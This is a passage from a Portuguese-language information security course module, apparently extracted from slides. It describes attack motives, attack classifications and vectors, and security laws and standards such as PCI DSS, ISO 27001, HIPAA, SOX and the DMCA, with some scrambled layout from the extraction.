Regulamentos de privacidade e Problemas de conformidade devido à Realocação de dados confidenciais de
proteção de dados fragmentados e implementação de Bring Your Own data centers legados para a nuvem sem
complexos Políticas de dispositivo (BYOD) em empresas configuração adequada
Desafios de segurança A
digitalização acelerada beneficiou o setor de TI de todas as formas; no entanto, também abriu caminho para ataques
cibernéticos sofisticados e desafios de segurança cibernética. Há uma necessidade de profissionais de segurança em
todas as organizações para proteger seus dados confidenciais e privados. Os profissionais de segurança enfrentam
muitos desafios e ameaças de invasores cibernéticos com a intenção de interromper suas redes e ativos.
A seguir estão alguns dos desafios de segurança enfrentados por profissionais e organizações de segurança:
ÿ Cumprimento das leis e regulamentos governamentais
ÿ Falta de profissionais de cibersegurança qualificados e qualificados ÿ
Dificuldade em centralizar a segurança em um ambiente de computação distribuída ÿ Dificuldade
em supervisionar processos de ponta a ponta devido à infraestrutura de TI complexa
ÿ Regulamentos de privacidade e proteção de dados fragmentados e complexos ÿ Uso
de uma arquitetura sem servidor e aplicativos que dependem de provedores de nuvem terceirizados ÿ Problemas
de conformidade e problemas com remoção e recuperação de dados devido à implementação de políticas Bring
Your Own Device (BYOD) em empresas
ÿ Realocação de dados confidenciais de data centers legados para a nuvem sem a devida
configuração
ÿ Elos fracos no gerenciamento da cadeia de
suprimentos ÿ Aumento dos riscos de segurança cibernética, como perda de dados e vulnerabilidades e erros não corrigidos
devido ao uso de shadow IT
ÿ Escassez de visibilidade de pesquisa e treinamento para funcionários de TI


Motivos, Metas e Objetivos da Segurança da Informação

Ataques
Ataques = Motivo (Objetivo) + Método + Vulnerabilidade
Um motivo se origina da noção de que o sistema de destino armazena ou processa algo valioso,
e isso leva à ameaça de um ataque ao sistema
Os invasores tentam várias ferramentas e técnicas de ataque para explorar vulnerabilidades em um sistema de computador
ou em sua política e controles de segurança para cumprir seus motivos
Motivos por trás dos ataques de segurança da informação
ÿ Perturbação da continuidade dos negócios
ÿ Roubar informações e manipular dados

ÿ Criando medo e caos ao interromper infraestruturas críticas
ÿ Causar prejuízo financeiro ao alvo
ÿ Prejudicar a reputação do alvo
Motivos, Metas e Objetivos dos Ataques à Segurança da Informação
Os invasores geralmente têm motivos (metas) e objetivos por trás de seus ataques de segurança da informação. Um
motivo se origina da noção de que um sistema de destino armazena ou processa algo valioso, o que leva à ameaça de
um ataque ao sistema. O objetivo do ataque pode ser interromper as operações de negócios da organização-alvo,
roubar informações valiosas por curiosidade ou até mesmo se vingar. Portanto, esses motivos ou objetivos dependem
do estado de espírito do atacante, de sua razão para realizar tal atividade, bem como de seus recursos e capacidades.
Depois que o invasor determina seu objetivo, ele pode empregar várias ferramentas, técnicas de ataque e métodos
para explorar vulnerabilidades em um sistema de computador ou em políticas e controles de segurança.
Ataques = Motivo (Objetivo) + Método + Vulnerabilidade

Motivos por trás dos ataques de segurança da informação
ÿ Interromper a continuidade dos negócios ÿ Alcançar os objetivos militares de um estado
ÿ Realizar roubo de informação ÿ Danificar a reputação do alvo
ÿ Manipulação de dados ÿ Vingar-se
ÿ Crie medo e caos interrompendo infraestruturas ÿ Exigir resgate

críticas
ÿ Trazer perda financeira para o alvo
ÿ Propagar convicções religiosas ou políticas


Classificação dos Ataques
Ataques passivos
ÿ Não adultere os dados e envolva interceptação e monitoramento de rede

tráfego e fluxo de dados na rede de destino
ÿ Exemplos incluem sniffing e espionagem
Ataques Ativos
ÿ Adulterar os dados em trânsito ou interromper a comunicação ou serviços entre os

sistemas para contornar ou invadir sistemas seguros
ÿ Exemplos incluem DoS, Man-in-the-Middle, seqüestro de sessão e injeção de SQL
Ataques de proximidade
ÿ São executadas quando o invasor está próximo fisicamente do sistema ou rede

de destino, a fim de coletar, modificar ou interromper o acesso às informações
ÿ Os exemplos incluem engenharia social, como espionagem, navegação no ombro
e mergulho no lixo
Classificação de Ataques (continuação)
Ataques internos Ataques de distribuição
ÿ Envolve o uso de privilégios ÿ Ocorre quando os atacantes

acesso para violar regras adulterar hardware ou
ou causar intencionalmente software antes da instalação
uma ameaça às informações
ou informações da organização
ÿ Os invasores adulteram o
sistemas
hardware ou software em sua
ÿ Exemplos incluem roubo de origem ou em trânsito
dispositivos físicos e
implantação de keyloggers,
backdoors e malware
Classificação dos Ataques
De acordo com a IATF, os ataques de segurança são classificados em cinco categorias: passivo, ativo, próximo,
interno e distribuição.
ÿ Ataques Passivos
Os ataques passivos envolvem interceptar e monitorar o tráfego de rede e o fluxo de dados na rede de
destino e não adulteram os dados. Atacantes realizam reconhecimento em


atividades de rede usando sniffers. Esses ataques são muito difíceis de detectar, pois o invasor não tem interação
ativa com o sistema ou rede de destino. Os ataques passivos permitem que os invasores capturem os dados ou
arquivos transmitidos na rede sem o consentimento do usuário. Por exemplo, um invasor pode obter informações
como dados não criptografados em trânsito, credenciais de texto não criptografado ou outras informações
confidenciais úteis na execução de ataques ativos.
Exemplos de ataques passivos:
o Pegada
o Sniffing e espionagem
o Análise de tráfego de rede
o Descriptografia de tráfego fracamente criptografado
ÿ Ataques Ativos
Os ataques ativos adulteram os dados em trânsito ou interrompem a comunicação ou os serviços entre os

sistemas para contornar ou invadir sistemas protegidos. Os invasores lançam ataques no sistema ou rede de
destino enviando tráfego ativamente que pode ser detectado. Esses ataques são executados na rede de destino
para explorar as informações em trânsito. Eles penetram ou infectam a rede interna do alvo e obtêm acesso a
um sistema remoto para comprometer a rede interna.
Exemplos de ataques ativos:
o Denial-of-service (DoS) attack o Ataque de firewall e IDS
o Contornar os mecanismos de proteção o Criação de perfil
o Ataques de malware (como o Execução de código arbitrário

vírus, worms, ransomware)
o Escalonamento de privilégios
o Modificação de informações
o Acesso backdoor
o Ataques de falsificação
o Ataques de criptografia
o Repetir ataques
o Injeção de SQL
o Ataques baseados em senha
o Ataques XSS
o Sequestro de sessão
o Ataques de travessia de diretório
o Ataque intermediário
o Exploração de aplicativos e
o Envenenamento de DNS e ARP OS software
o Ataque de chave comprometida
ÿ Ataques Fechados
Os ataques de proximidade são executados quando o invasor está próximo fisicamente do sistema ou rede de
destino. O principal objetivo de realizar esse tipo de ataque é coletar ou modificar informações ou interromper
seu acesso. Por exemplo, um invasor pode surfar no ombro


as credenciais do usuário. Os invasores se aproximam por meio de entrada clandestina, acesso aberto ou
ambos.
Exemplos de ataques próximos:
o Engenharia social (escuta, navegação no ombro, mergulho no lixo e outros

métodos)
ÿ Ataques Internos
Os ataques internos são executados por pessoas confiáveis que têm acesso físico aos ativos críticos do alvo.
Um ataque interno envolve o uso de acesso privilegiado para violar regras ou causar intencionalmente uma
ameaça às informações ou aos sistemas de informações da organização.
Os insiders podem ignorar facilmente as regras de segurança, corromper recursos valiosos e acessar
informações confidenciais. Eles fazem mau uso dos ativos da organização para afetar diretamente a
confidencialidade, integridade e disponibilidade dos sistemas de informação. Esses ataques afetam as
operações comerciais, a reputação e os lucros da organização. É difícil descobrir um ataque interno
Exemplos de ataques internos:
o Escutas e escutas telefônicas
o Roubo de dispositivos físicos
o Engenharia social
o Roubo e espoliação de dados
o Pod sorvendo
o Plantar keyloggers, backdoors ou malware
ÿ Ataques de Distribuição
Os ataques de distribuição ocorrem quando os invasores adulteram o hardware ou o software antes da

instalação. Os invasores adulteram o hardware ou software em sua origem ou quando estão em trânsito.
Exemplos de ataques de distribuição incluem backdoors criados por fornecedores de software ou hardware
no momento da fabricação. Os invasores aproveitam esses backdoors para obter acesso não autorizado às
informações, sistemas ou rede de destino.
o Modificação de software ou hardware durante a produção
o Modificação de software ou hardware durante a distribuição


Vetores de ataque de segurança da informação
Computação em Nuvem Avançado Persistente vírus e ransomware Ameaças móveis

Ameaças Ameaças (APT) Vermes
A computação em nuvem é Um ataque focado A ameaça de rede mais Restringe o acesso O foco dos invasores mudou
uma entrega sob demanda de em roubar informações prevalente que é capaz aos arquivos e pastas para dispositivos móveis
capacidades de TI onde de de infectar uma rede do sistema do devido a
dados sensíveis de a máquina da vítima em segundos computador e exige um maior adoção de dispositivos
organizações e seus clientes é sem que o usuário esteja pagamento de resgate móveis para fins comerciais
armazenado. Falha na nuvem ciente disso online ao(s) criador(es) do e pessoais e controles de
de aplicativos de um cliente malware para remover o segurança comparativamente
permite que invasores menores
acessar dados de outros clientes restrições
Vetores de ataque à segurança da informação (continuação)
Aplicativo Web IoT

botnet Ataque interno Phishing Ameaças Ameaças
Uma enorme rede de Um ataque realizado A prática de Os invasores visam Dispositivos
sistemas comprometidos em uma rede enviar um e- mail aplicativos da web para IoT incluem
usados por um intruso corporativa ou em um ilegítimo alegando roubar credenciais, muitos softwares
para realizar vários único computador por falsamente ser de um configurar sites de aplicativos que são
ataques de rede usados para acessar
uma pessoa confiada site legítimo na tentativa phishing ou adquirir
informações privadas para o dispositivo
(insider) que autorizou de obter as informações
o acesso à rede pessoais ou da conta de ameaçar o remotamente
um usuário desempenho do site e Falhas nos

prejudicar sua segurança dispositivos IoT
permitem que
invasores acessem
o dispositivo
remotamente e
executem vários ataques
Vetores de ataque de segurança da informação
Abaixo está uma lista de vetores de ataque à segurança da informação por meio dos quais um invasor pode obter
acesso a um computador ou servidor de rede para fornecer uma carga útil ou buscar um resultado malicioso.
ÿ Ameaças de computação em nuvem: A computação em nuvem refere-se à entrega sob demanda de recursos
de TI em que a infraestrutura e os aplicativos de TI são fornecidos aos assinantes como um serviço medido
em uma rede. Os clientes podem armazenar informações confidenciais na nuvem. UMA


falha na nuvem de aplicativos de um cliente pode permitir que invasores acessem os dados de outro
cliente.
ÿ Ameaças persistentes avançadas (APTs): Refere-se a um ataque que se concentra em roubar

informações da máquina da vítima sem que seu usuário esteja ciente disso. Esses ataques geralmente
são direcionados a grandes empresas e redes governamentais. Como os ataques APT são lentos por
natureza, seu efeito no desempenho do computador e nas conexões com a Internet é insignificante.
APTs exploram vulnerabilidades nos aplicativos executados em computadores, sistemas operacionais
e sistemas integrados.
ÿ Vírus e worms: Vírus e worms são as ameaças de rede mais comuns e são capazes de infectar uma rede
em segundos. Um vírus é um programa autorreplicante que produz uma cópia de si mesmo anexando-
o a outro programa de computador, setor de inicialização ou documento. Um worm é um programa
malicioso que se replica, executa e se espalha pelas conexões de rede.
Os vírus entram no computador quando o invasor compartilha um arquivo malicioso que o contém com
a vítima pela Internet ou por qualquer mídia removível.
Os worms entram na rede quando a vítima baixa um arquivo malicioso, abre um e-mail de spam ou
navega em um site malicioso.
ÿ Ransomware: Ransomware é um tipo de malware que restringe o acesso aos arquivos e pastas do
sistema do computador e exige um pagamento de resgate online ao(s) criador(es) do malware para
remover as restrições. Geralmente se espalha por meio de anexos maliciosos de mensagens de e-mail,
aplicativos de software infectados, discos infectados ou sites comprometidos.
ÿ Ameaças móveis: Os invasores estão cada vez mais se concentrando em dispositivos móveis devido ao
aumento da adoção de smartphones para negócios e uso pessoal e seus comparativamente menos
controles de segurança.
Os usuários podem baixar aplicativos infestados de malware (APKs) em seus smartphones, o que pode
danificar outros aplicativos e dados ou revelar informações confidenciais aos invasores. Os invasores
podem acessar remotamente a câmera de um smartphone e o aplicativo de gravação para visualizar as
atividades do usuário e rastrear as comunicações de voz, o que pode ajudá-los em um ataque.
ÿ Botnet: Uma botnet é uma enorme rede de sistemas comprometidos usados por invasores para realizar
ataques de negação de serviço. Os bots, em uma botnet, executam tarefas como upload de vírus, envio
de e-mails com botnets anexados a eles, roubo de dados e assim por diante. Os programas antivírus
podem não encontrar — ou até mesmo verificar — spyware ou botnets. Portanto, é essencial implantar
programas especificamente projetados para encontrar e eliminar essas ameaças.
ÿ Ataque interno: Um ataque interno é um ataque de alguém de dentro de uma organização que autorizou
o acesso à sua rede e está ciente da arquitetura da rede.
ÿ Phishing: Phishing refere-se à prática de enviar um e-mail ilegítimo alegando falsamente ser de um site
legítimo na tentativa de obter as informações pessoais ou da conta de um usuário. Os invasores realizam
ataques de phishing distribuindo links maliciosos por meio de algum canal de comunicação ou e-mails
para obter informações privadas, como números de contas,


números de cartão de crédito, números de celular, etc. da vítima. Os invasores criam e-mails para
atrair as vítimas de forma que pareçam ser de alguma fonte legítima ou, às vezes, enviem links
maliciosos que se assemelham a um site legítimo.
ÿ Ameaças de aplicativos da Web: ataques como injeção de SQL e script entre sites tornaram os
aplicativos da Web um alvo favorável para que invasores roubem credenciais, configurem sites de
phishing ou adquiram informações privadas. A maioria desses ataques é resultado de codificação
defeituosa e sanitização inadequada de dados de entrada e saída do aplicativo da web. Os ataques
a aplicativos da Web podem ameaçar o desempenho do site e prejudicar sua segurança.
ÿ Ameaças IoT: Dispositivos IoT conectados à Internet possuem pouca ou nenhuma segurança, o que
os torna vulneráveis a diversos tipos de ataques. Esses dispositivos incluem muitos aplicativos de
software usados para acessar o dispositivo remotamente. Devido a restrições de hardware, como
memória, bateria, etc., esses aplicativos IoT não incluem mecanismos de segurança complexos
para proteger os dispositivos contra ataques. Essas desvantagens tornam os dispositivos IoT mais
vulneráveis e permitem que invasores acessem o dispositivo remotamente e executem vários ataques.


Fluxo do módulo
Discutir informações
Fundamentos de segurança
Discutir vários
Segurança da informação
Leis e regulamentos
Discutir várias leis e regulamentos de segurança da informação

As leis são um sistema de regras e diretrizes que são aplicadas por um determinado país ou
comunidade para governar o comportamento. Um Padrão é um “documento estabelecido por
consenso e aprovado por um órgão reconhecido que fornece, para uso comum e repetido,
regras, diretrizes ou características para atividades ou seus resultados, visando a obtenção do
grau ótimo de ordem em um determinado contexto .” Esta seção trata das várias leis e
regulamentos que tratam da segurança da informação em diferentes países.


Padrão de segurança de dados do setor de cartões de pagamento (PCI DSS)
ÿ Um padrão proprietário de segurança de informações para organizações que lidam com informações de titulares de cartão para
principais cartões de débito, crédito, pré-pago, e-purse, ATM e POS
ÿ O PCI DSS se aplica a todas as entidades envolvidas no processamento de cartões de pagamento — incluindo comerciantes,
processadores, adquirentes, emissores e prestadores de serviços, bem como todas as outras entidades que armazenam, processam ou
transmitem dados do titular do cartão
Padrão de segurança de dados PCI — visão geral de alto nível
Construa e mantenha uma rede segura Implementar medidas fortes de controle de acesso
Proteger os dados do titular do cartão Monitore e teste regularmente as redes
Mantenha um programa de gerenciamento de vulnerabilidades Mantenha uma Política de Segurança da Informação
https:// www.pcisecuritystandards.org
O não cumprimento dos requisitos do PCI DSS pode resultar em multas ou no cancelamento dos privilégios de processamento do cartão de pagamento
Padrão de segurança de dados do setor de cartões de pagamento (PCI DSS)
Fonte: https:// www.pcisecuritystandards.org
O padrão de segurança de dados do setor de cartões de pagamento (PCI DSS) é um padrão de segurança de
informações proprietário para organizações que lidam com informações de titulares de cartão para os principais
cartões de débito, crédito, pré-pagos, e-purse, ATM e POS. Este padrão oferece padrões robustos e abrangentes e
materiais de suporte para aumentar a segurança dos dados do cartão de pagamento. Esses materiais incluem uma
estrutura de especificações, ferramentas, medições e recursos de suporte para ajudar as organizações a garantir o
manuseio seguro das informações do titular do cartão. O PCI DSS se aplica a todas as entidades envolvidas no
processamento de cartões de pagamento, incluindo comerciantes, processadores, adquirentes, emissores e
provedores de serviços, bem como todas as outras entidades que armazenam, processam ou transmitem dados do titular do cartão.
O PCI DSS compreende um conjunto mínimo de requisitos para proteger os dados do titular do cartão. O Conselho
de Padrões de Segurança da Indústria de Cartões de Pagamento (PCI) desenvolveu e mantém uma visão geral de
alto nível dos requisitos do PCI DSS.
Padrão de segurança de dados PCI - visão geral de alto nível

ÿ
Instale e mantenha uma configuração de firewall para proteger os
Construa e mantenha um seguro dados do titular do cartão
Rede ÿ Não use padrões fornecidos pelo fornecedor para senhas do sistema
e outros parâmetros de segurança
ÿ Proteja os dados armazenados do titular do cartão
Proteger os dados do titular do cartão ÿ Criptografe a transmissão dos dados do titular do cartão em canais abertos e públicos
redes
Manter uma vulnerabilidade ÿ Use e atualize regularmente software ou programas antivírus ÿ Desenvolva
Programa de Gestão e mantenha sistemas e aplicativos seguros


ÿ Restrinja o acesso aos dados do titular do cartão por necessidade comercial

Implementar Acesso Forte
ÿ Atribua uma ID exclusiva a cada pessoa com acesso ao computador ÿ
Medidas de controle
Restrinja o acesso físico aos dados do titular do cartão
ÿ Rastreie e monitore todo o acesso aos recursos de rede e
Monitore e teste regularmente dados do titular do cartão
Redes
ÿ Testar regularmente sistemas e processos de segurança
Manter uma informação ÿ Manter uma política que trate da segurança da informação para todos
Política de segurança pessoal
Tabela 1.1: Tabela mostrando o padrão de segurança de dados do PCI - visão geral de alto nível
O não cumprimento dos requisitos do PCI DSS pode resultar em multas ou no cancelamento dos privilégios de processamento
do cartão de pagamento.


ISO/IEC 27001:2013
ÿ Especifica os requisitos para estabelecer, implementar, manter e melhorar continuamente um
sistema de gerenciamento de segurança da informação dentro do contexto da organização
ÿ Destina-se a ser adequado para vários tipos de uso, incluindo:
Use dentro das organizações para formular requisitos e Identificação e esclarecimento dos processos de gestão de
objetivos de segurança segurança da informação existentes
Use dentro das organizações para garantir que os riscos de Uso pelo gerenciamento da organização para determinar o status das
segurança sejam gerenciados de maneira econômica atividades de gerenciamento de segurança da informação
Use dentro das organizações para garantir a conformidade Implementação de segurança da informação para negócios
com leis e regulamentos
Definição de novos processos de gestão de segurança da Uso pelas organizações para fornecer informações relevantes sobre
informação segurança da informação aos clientes
https:// www.iso.org
ISO/IEC 27001:2013
Fonte: https:// www.iso.org
A ISO/IEC 27001:2013 especifica os requisitos para estabelecer, implementar, manter e melhorar continuamente um
sistema de gerenciamento de segurança da informação no contexto de uma organização. Inclui requisitos para avaliação
e tratamento de riscos de segurança da informação adaptados às necessidades da organização.
O regulamento destina-se a ser adequado para vários usos diferentes, incluindo:
ÿ Uso dentro das organizações para formular requisitos e objetivos de segurança
ÿ Use dentro das organizações como uma forma de garantir que os riscos de segurança sejam econômicos
gerenciou
ÿ Use dentro das organizações para garantir a conformidade com leis e regulamentos
ÿ Definição de novos processos de gestão de segurança da informação
ÿ Identificar e esclarecer os processos de gestão de segurança da informação existentes
ÿ Utilização pela gestão das organizações para determinar o estado da informação

atividades de gerenciamento de segurança
ÿ Implementação de segurança da informação que habilita os negócios
ÿ Uso por organizações para fornecer informações relevantes sobre segurança da informação para
clientes


Portabilidade e Responsabilidade do Seguro de Saúde

Lei (HIPAA)
Estatuto e regras de simplificação administrativa da HIPAA
Eletrônico
Exige que todos os provedores que fazem negócios eletronicamente usem as mesmas
Transação e
transações de assistência médica, conjuntos de códigos e identificadores
Padrões de conjunto de código
Fornece proteções federais para as informações pessoais de saúde

regra de privacidade mantidas por entidades cobertas e oferece aos pacientes uma série de direitos
com relação a essas informações
Especifica uma série de salvaguardas administrativas, físicas e técnicas para

Regra de segurança entidades cobertas usarem para garantir a confidencialidade, integridade e
disponibilidade de informações de saúde protegidas eletronicamente
Exige que prestadores de serviços de saúde, planos de saúde e empregadores

Identificador Nacional
tenham números nacionais padrão que os identifiquem anexados a transações
Requisitos
padrão
Fornece os padrões para fazer cumprir todas as regras da Administração

Regra de Execução
Regras de Simplificação
https:// www.hhs.gov
Lei de Portabilidade e Responsabilidade de Seguro Saúde (HIPAA)
Fonte: https:// www.hhs.gov
A regra de privacidade da HIPAA fornece proteções federais para as informações de saúde individualmente identificáveis
mantidas por entidades cobertas e seus parceiros de negócios e dá aos pacientes uma série de direitos a essas
informações. Ao mesmo tempo, a regra de privacidade permite a divulgação de informações de saúde necessárias para
atendimento ao paciente e outros fins necessários.
A Regra de Segurança especifica uma série de proteções administrativas, físicas e técnicas para entidades cobertas e
seus parceiros de negócios usarem para garantir a confidencialidade, integridade e disponibilidade de informações de
saúde protegidas eletronicamente.
O escritório de direitos civis implementou o Estatuto e as Regras de Simplificação Administrativa da HIPAA, conforme
discutido abaixo:
ÿ Transações Eletrônicas e Padrões de Conjunto de Códigos
As transações são trocas eletrônicas envolvendo a transferência de informações entre duas partes para fins
específicos. A Lei de Portabilidade e Responsabilidade de Seguro de Saúde de 1996 (HIPAA) designou certos
tipos de organizações como entidades cobertas, incluindo planos de saúde, câmaras de compensação de
assistência médica e certos provedores de assistência médica. Nos regulamentos da HIPAA, o Secretário de
Saúde e Serviços Humanos (HHS) adotou certas transações padrão para o Intercâmbio Eletrônico de Dados
(EDI) de dados de saúde. Essas transações são reivindicações e encontrar informações, conselhos de
pagamento e remessa, status de reivindicação, elegibilidade, inscrição e cancelamento de inscrição, referências
e autorizações, coordenação de benefícios e pagamento de prêmio. De acordo com a HIPAA, se uma entidade
coberta conduzir eletronicamente uma das transações adotadas, ela deve usar o padrão adotado - da ASC,
X12N ou NCPDP (para determinadas farmácias


transações). As entidades cobertas devem aderir aos requisitos de conteúdo e formato de cada transação. Todo
provedor que faz negócios eletronicamente deve usar as mesmas transações de assistência médica, conjuntos de
códigos e identificadores.
ÿ Regra de Privacidade
A regra de privacidade da HIPAA estabelece padrões nacionais para proteger os registros médicos das pessoas e
outras informações pessoais de saúde e se aplica a planos de saúde, câmaras de compensação de assistência
médica e provedores de assistência médica que conduzem determinadas transações de assistência médica
eletronicamente. A regra exige salvaguardas adequadas para proteger a privacidade das informações pessoais de
saúde. Ela estabelece limites e condições sobre os usos e divulgações que podem ser feitas dessas informações sem
a autorização do paciente. A regra também concede direitos aos pacientes sobre suas informações de saúde, incluindo
o direito de examinar e obter uma cópia de seus registros de saúde e solicitar correções.
ÿ Regra de Segurança
A regra de segurança da HIPAA estabelece padrões nacionais para proteger as informações pessoais eletrônicas de
saúde dos indivíduos que são criadas, recebidas, usadas ou mantidas por uma entidade coberta. A Regra de
Segurança exige salvaguardas administrativas, físicas e técnicas adequadas para garantir a confidencialidade,
integridade e segurança das informações de saúde protegidas eletronicamente.
ÿ Norma de Identificação do Empregador
A HIPAA exige que cada empregador tenha um número nacional padrão que os identifique em transações padrão.
ÿ Padrão Identificador de Provedor Nacional (NPI)
O National Provider Identifier (NPI) é um padrão de simplificação administrativa da HIPAA.

O NPI é um número de identificação exclusivo atribuído aos prestadores de cuidados de saúde abrangidos.
Os provedores de assistência médica cobertos e todos os planos de saúde e câmaras de compensação de assistência
médica devem usar as NPIs nas transações administrativas e financeiras adotadas pela HIPAA. O NPI é um
identificador numérico sem inteligência de 10 posições (número de 10 dígitos). Isso significa que os números não
trazem outras informações sobre profissionais de saúde, como o estado em que vivem ou sua especialidade médica.
ÿ Norma de Execução
A Regra de Execução da HIPAA contém disposições relativas à conformidade e investigação, bem como a imposição
de penalidades monetárias civis por violações das Regras de Simplificação Administrativa da HIPAA e procedimentos
para audiências.


Lei Sarbanes Oxley

(SOX)
ÿ Promulgada em 2002, a Lei Sarbanes-Oxley foi criada para proteger os investidores e o público aumentando
a precisão e a confiabilidade das divulgações corporativas
ÿ Os principais requisitos e disposições da SOX estão organizados em 11 títulos:
Título I Título II Título III

Contabilidade de empresa pública A Independência do Auditor estabelece os A Responsabilidade Corporativa
Conselho de Supervisão padrões para a independência do auditor externo, com o exige que os executivos seniores
(PCAOB) fornece supervisão objetivo de limitar os conflitos de interesse e atender aos assumir a responsabilidade individual
independente de empresas de novos requisitos de aprovação do auditor, rotação do pela precisão e integridade dos relatórios
contabilidade pública que prestam parceiro de auditoria e requisitos de relatório do auditor financeiros corporativos
serviços de auditoria (“auditores”)
https:// www.sec.gov
Lei Sarbanes Oxley

(SOX) (continuação)
Título IV
As Divulgações Financeiras Aprimoradas descrevem os requisitos aprimorados de relatórios para
transações financeiras, incluindo transações extrapatrimoniais, números pró-forma e transações de ações
de executivos corporativos
Título V
Os Conflitos de Interesse de Analistas consistem em medidas destinadas a ajudar a restaurar a
confiança do investidor nos relatórios de analistas de valores mobiliários
Título VI
Recursos e Autoridade da Comissão definem práticas para restaurar a confiança dos
investidores nos analistas de valores mobiliários
Título VII
Estudos e relatórios incluem os efeitos da consolidação de empresas de contabilidade
pública, o papel das agências de classificação de crédito na operação dos mercados de
valores mobiliários, violações de valores mobiliários e ações de execução, e se os bancos de
investimento ajudaram a Enron, Global Crossing ou outros a manipular ganhos e ofuscar
verdadeiras condições financeiras


Lei Sarbanes Oxley (SOX) (continuação)

Título VIII
A responsabilidade de fraude corporativa e criminal descreve penalidades criminais específicas
para fraude pela manipulação, destruição ou alteração de registros financeiros ou outra interferência
em investigações, ao mesmo tempo em que fornece certas proteções para denunciantes
Título X
O aprimoramento da penalidade por crimes de colarinho branco aumenta as penalidades
criminais associadas a crimes de colarinho branco e conspirações. Ele recomenda diretrizes
de condenação mais rígidas e acrescenta especificamente a falha em certificar relatórios
financeiros corporativos como uma ofensa criminal
Título IX
Corporate Tax Returns estabelece que o CEO deve assinar a declaração de imposto
da empresa
Título XI
A Corporate Fraud Accountability identifica a fraude corporativa e a adulteração de registros como
ofensas criminais e atribui a elas penalidades específicas. Ele também revisa as diretrizes de
condenação e fortalece suas penalidades. Isso permite que a SEC congele temporariamente pagamentos
grandes ou incomuns
Lei Sarbanes Oxley (SOX)
Fonte: https:// www.sec.gov
Promulgada em 2002, a Lei Sarbanes-Oxley visa proteger o público e os investidores, aumentando a precisão e
a confiabilidade das divulgações corporativas. Este ato não explica como uma organização deve armazenar
registros, mas descreve os registros que as organizações devem armazenar e a duração de seu armazenamento.
A Lei determinou várias reformas para aumentar a responsabilidade corporativa, aprimorar as divulgações
financeiras e combater a fraude corporativa e contábil.
Os principais requisitos e disposições da SOX estão organizados em 11 títulos:
ÿ Título I: Conselho Fiscal de Contabilidade das Empresas Abertas (PCAOB)
O Título I consiste em nove seções e estabelece o Conselho de Supervisão de Contabilidade de

Companhias Abertas para fornecer supervisão independente de firmas de contabilidade pública que
prestam serviços de auditoria ("auditores"). Também cria um conselho de supervisão central encarregado
de registrar os serviços de auditoria, definir os processos e procedimentos específicos para auditorias
de conformidade, inspecionar e policiar a conduta e o controle de qualidade e fazer cumprir os mandatos
específicos da SOX.
ÿ Título II: Independência do Auditor
O Título II consiste em nove seções e estabelece padrões de independência do auditor externo para
limitar conflitos de interesse. Ele também aborda novos requisitos de aprovação de auditores, rotação
de parceiros de auditoria e requisitos de relatórios de auditores. Ela restringe as empresas de auditoria
de fornecer serviços não relacionados à auditoria (como consultoria) para os mesmos clientes.


ÿ Título III: Responsabilidade Corporativa
O Título III consiste em oito seções e exige que os executivos seniores assumam responsabilidade individual
pela precisão e integridade dos relatórios financeiros corporativos. Ele define a interação entre auditores
externos e comitês de auditoria corporativos e especifica a responsabilidade dos executivos corporativos pela
precisão e validade dos relatórios financeiros corporativos. Ele enumera limites específicos sobre o
comportamento de executivos corporativos e descreve confiscos específicos de benefícios e penalidades civis
por não conformidade.
ÿ Título IV: Divulgações Financeiras Reforçadas
O Título IV consiste em nove seções. Ele descreve os requisitos aprimorados de relatórios para transações
financeiras, incluindo transações extrapatrimoniais, números pró-forma e transações de ações de executivos
corporativos. Exige controles internos para garantir a precisão dos relatórios e divulgações financeiras e exige
auditorias e relatórios sobre esses controles. Também exige relatórios oportunos de mudanças materiais nas
condições financeiras e revisões específicas aprimoradas de relatórios corporativos pela SEC ou seus agentes.
ÿ Título V: Conflitos de Interesse do Analista
O Título V consiste em apenas uma seção que discute as medidas destinadas a ajudar a restaurar a confiança
do investidor nos relatórios dos analistas de valores mobiliários. Ele define o código de conduta para analistas
de valores mobiliários e exige que divulguem quaisquer conflitos de interesse conhecidos.
ÿ Título VI: Recursos e Autoridade da Comissão
O Título VI consiste em quatro seções e define práticas para restaurar a confiança do investidor nos analistas
de valores mobiliários. Ele também define a autoridade da SEC para censurar ou proibir a prática de
profissionais de valores mobiliários e define as condições para impedir uma pessoa de praticar como corretor,
consultor ou negociante.
ÿ Título VII: Estudos e Relatórios
O Título VII consiste em cinco seções e exige que o Controlador Geral e a Securities and Exchange Commission
(SEC) realizem vários estudos e relatem suas conclusões.
Os estudos e relatórios necessários incluem os efeitos da consolidação de empresas de contabilidade pública,
o papel das agências de classificação de crédito na operação dos mercados de valores mobiliários, violações
de valores mobiliários, ações de execução e se os bancos de investimento ajudaram a Enron, Global Crossing
e outros a manipular lucros e ofuscar as verdadeiras condições financeiras.
ÿ Título VIII: Responsabilização Empresarial e Fraude Criminal
O Título VIII, também conhecido como “Lei de Responsabilidade por Fraude Corporativa e Criminal de 2002”,
consiste em sete seções. Ele descreve penalidades criminais específicas para a manipulação, destruição ou
alteração de registros financeiros ou interferência em investigações, além de fornecer certas proteções para
denunciantes.


ÿ Título IX: Aperfeiçoamento de Penas para Crimes de Colarinho Branco
O Título IX, também conhecido como "Lei de Aprimoramento de Penalidades para Crimes de Colarinho
Branco de 2002", consiste em seis seções. Este título aumenta as penalidades criminais associadas a
crimes de colarinho branco e conspirações. denúncias como crime.
ÿ Título X: Declarações de IRC
O Título X consiste em uma seção que estabelece que o Diretor-Presidente deve assinar a declaração de
imposto da empresa.
ÿ Título XI: Responsabilidade Corporativa por Fraude
O Título XI consiste em sete seções. A Seção 1101 recomenda o seguinte nome para o título: “Lei de
Responsabilidade de Fraude Corporativa de 2002”. Ele identifica fraudes corporativas e adulteração de
registros como ofensas criminais e associa essas ofensas a penalidades específicas. Ele também revisa
as diretrizes de condenação e fortalece as penalidades. Isso permite que a SEC congele temporariamente
transações ou pagamentos “grandes” ou “incomuns”.


O milênio digital
Lei de Direitos Autorais (DMCA)
ÿ O DMCA é uma lei de direitos autorais dos Estados Unidos que implementa dois tratados de 1996 do
Organização da Propriedade Intelectual (OMPI)
ÿ Define as proibições legais contra a evasão da proteção tecnológica

medidas empregadas pelos proprietários de direitos autorais para proteger suas obras e contra a remoção ou
alteração de informações de gerenciamento de direitos autorais
https:// www.copyright.gov
A Lei de Direitos Autorais do Milênio Digital (DMCA)
Fonte: https:// www.copyright.gov
O DMCA é uma lei de direitos autorais americana que implementa dois tratados de 1996 da Organização Mundial de
Propriedade Intelectual (WIPO): o Tratado de Direitos Autorais da OMPI e o Tratado de Performances e Fonogramas
da WIPO. A fim de implementar as obrigações do tratado dos EUA, o DMCA define proibições legais contra a evasão
